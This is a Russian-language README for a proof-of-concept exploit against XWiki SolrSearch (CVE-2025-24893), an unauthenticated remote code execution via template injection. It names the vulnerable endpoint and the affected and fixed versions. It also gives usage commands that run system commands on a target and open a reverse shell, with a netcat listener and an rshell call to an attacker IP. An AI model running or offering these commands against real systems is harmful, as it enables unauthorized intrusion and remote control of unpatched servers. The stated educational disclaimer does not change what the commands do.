
PoC неавторизованного RCE для XWiki SolrSearch (CVE-2025-24893). Выполнение команд + обратная оболочка.
Неавторизованный RCE PoC для XWiki SolrSearch (CVE-2025-24893). Выполнение команд + обратный шелл.
Доказательство концепции (PoC) для инъекции шаблонов XWiki SolrSearch, приводящей к неавторизованному удалённому выполнению кода.
Протестировано на XWiki Debian 15.10.8 (исправлено в версиях 15.10.11 / 16.4.1 / 16.5.0RC1).
⚠️ Только для образовательных целей. Не запускайте это против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
/xwiki/bin/get/Main/SolrSearch.pip install requests
Укажите целевой хост (и опциональный путь) при запуске скрипта.
Запуск базовых команд:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
Запуск обратного шелла:
# На атакующей машине
nc -lvnp 4444
# Из PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...